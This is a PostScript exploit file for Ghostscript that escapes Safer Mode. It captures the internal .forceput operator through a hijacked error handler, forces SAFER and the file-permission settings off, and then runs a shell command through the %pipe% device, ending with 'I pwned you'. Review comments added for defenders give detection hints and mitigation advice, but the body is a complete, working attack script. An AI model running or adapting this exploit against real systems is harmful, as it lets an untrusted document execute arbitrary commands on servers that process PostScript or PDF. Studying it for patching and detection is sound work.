ghostrule4.ps
%!PS
%%
%% Safer Mode Bypass by `.forceput` Exposure from `.buildfont1`
%%
%% Author: Hiroki MATSUKUMA
%%
%% Output helpers. Each one consumes a single string from the operand stack.
%% println writes the string and then a newline.
/println { print (\n) print } bind executeonly def
%% info / success / fail write a "[*] ", "[+] " or "[-] " tag, then the message
%% and a newline. fail additionally executes `stop`, which aborts the run.
/info { ([*] ) print print (\n) print } bind executeonly def
/success { ([+] ) print print (\n) print } bind executeonly def
/fail { ([-] ) print print (\n) print stop } bind executeonly def
%% Upper bound on the number of bytes readfile returns: 16#10000 = 65536.
/MaxFileSize 16#10000 def
%% readfile: filename-string -> contents-string
%% Opens the named file for reading, reads at most MaxFileSize bytes into a
%% freshly allocated string, closes the file and leaves the bytes read on the
%% operand stack.
/readfile {
(r) file
%% readstring leaves (substring, bool); the bool is dropped, so a short read and
%% a completely filled buffer are not told apart and longer input is truncated.
dup MaxFileSize string readstring pop
exch closefile
} bind executeonly def
%% osexec: command-string -> output-string
%% Prepends the %pipe% device name to the command string and passes the result
%% to readfile, so the "file" that gets opened is a pipe from a child process.
%% NOTE(review): opening %pipe% is one of the capabilities Safer Mode is meant to
%% deny to untrusted jobs. For defenders, a `file` call on a string beginning
%% with "%pipe%" in document input is a strong indicator worth alerting on, and
%% an interpreter process spawning a shell is the matching host-side signal.
/osexec {
(%pipe%) exch concatstrings readfile
} bind executeonly def
%% Banner: three lines, each written by println as soon as it is pushed.
%% The first and last line are the same rule of '=' characters.
(=============================================================================) println
(= Safer Mode Bypass by `.forceput` Exposure from `.buildfont1` =) println
(=============================================================================) println
%% Stage 1: try to capture a reference to .forceput through a replaced error
%% handler.
%% NOTE(review): two properties make this stage possible. The job can replace
%% entries in errordict, and the handler runs while interpreter-internal objects
%% are still on the operand stack. The durable fix is in the interpreter
%% (see the header: .buildfont1 exposes .forceput), so patching Ghostscript is
%% the mitigation; input filtering is not.
(Obtaining .forceput operator from .buildfont1 operator...) info
%% Placeholder binding; the handler below overwrites it via `store` if it fires.
/.forceput null def
%% Keep the original typecheck handler so it can be reinstated afterwards.
/&typecheck errordict /typecheck get def
/typecheckcount 0 def
%% Install a typecheck handler that counts its own invocations.
errordict /typecheck {
/typecheckcount typecheckcount 1 add def
typecheckcount 10 eq {
%% Tenth invocation only: read element 13 of the object four deep on the operand
%% stack and keep it as .forceput. The constants 10, 3 and 13 depend on the
%% stack and procedure layout of the interpreter build this was written for;
%% SOURCE does not name that build.
3 index 13 get
/.forceput exch store
%% Drops one operand and leaves `false` — presumably the result the interrupted
%% code expects; TODO confirm against the interpreter source.
pop false
} if
} put
%% Invoke .buildfont1 with two null operands (presumably to drive it into the
%% typecheck path handled above), then empty the operand stack.
null null .buildfont1 clear
%% Reinstate the saved typecheck handler.
errordict /typecheck currentdict /&typecheck get put
%% Remove the temporary names from the current dictionary.
[
/&typecheck
/typecheckcount
] { currentdict exch undef } forall
%% This message is printed unconditionally; whether the capture actually worked
%% is only established by the sanity check that follows.
(A candidate for .forceput operator found!) success
%% Stage 2: verify the captured object really behaves like .forceput by using it
%% to write into a dictionary that has been made read-only.
(Attempting sanity check with the candidate for .forceput operator...) info
%% Scratch dictionary with a single key, marked readonly so an ordinary `put`
%% into it would be refused.
<< /overwritten false >> readonly
begin
%% Attempt the forced write: set /overwritten to true in the read-only dict.
currentdict /overwritten true .forceput
%% If the value is still false the candidate did not work; remove the
%% .forceput binding from whichever dictionary `where` finds it in.
overwritten not {
/.forceput where { /.forceput undef } if
} if
end
%% After `end`, a missing .forceput binding means the check failed; `fail`
%% prints the message and executes `stop`.
currentdict /.forceput known not {
(.forceput operator could not found...) fail
} if
(Successfully got .forceput operator!) success
%% Stage 3: use the forced-write primitive on the settings that implement
%% Safer Mode.
%% NOTE(review): every setting changed here lives in a dictionary the job can
%% name (systemdict, userparams). Once a forced write leaks, the policy offers
%% no further resistance. Treat the interpreter's own sandbox as one layer only
%% and run it under OS-level confinement (unprivileged user,
%% seccomp/AppArmor/container, no network) when handling untrusted documents.
(Overwriting several flags to escape from Safer Mode...) info
%% Clear the SAFER flag in systemdict.
systemdict /SAFER false .forceput
%% Unlock the file-permission parameters, then set each permit list to the
%% single pattern (*).
userparams /LockFilePermissions false .forceput
userparams /PermitFileControl [(*)] .forceput
userparams /PermitFileWriting [(*)] .forceput
userparams /PermitFileReading [(*)] .forceput
%% NOTE(review): purpose of the save/restore pair is not evident from SOURCE —
%% presumably it makes the interpreter pick up the modified parameters; confirm.
save restore
%% SAFER is looked up as a boolean; if it is still true the run is aborted
%% through `fail`.
SAFER {
(Could not escape from Safer Mode.) fail
} bind executeonly if
(Successfully escaped from Safer Mode!) success
%% Stage 4: demonstration of impact. Runs the fixed command `id` through osexec
%% (the %pipe% device) and prints whatever it returned, showing that code ran
%% with the privileges of the interpreter process.
%% NOTE(review): the account shown in that output is what an untrusted document
%% would inherit, so services that convert PostScript/PDF should run the
%% interpreter as a dedicated low-privilege user.
(Executing a shell command...) info
(id) osexec print
(PS: I pwned you <3) success
%% Terminate the interpreter.
quit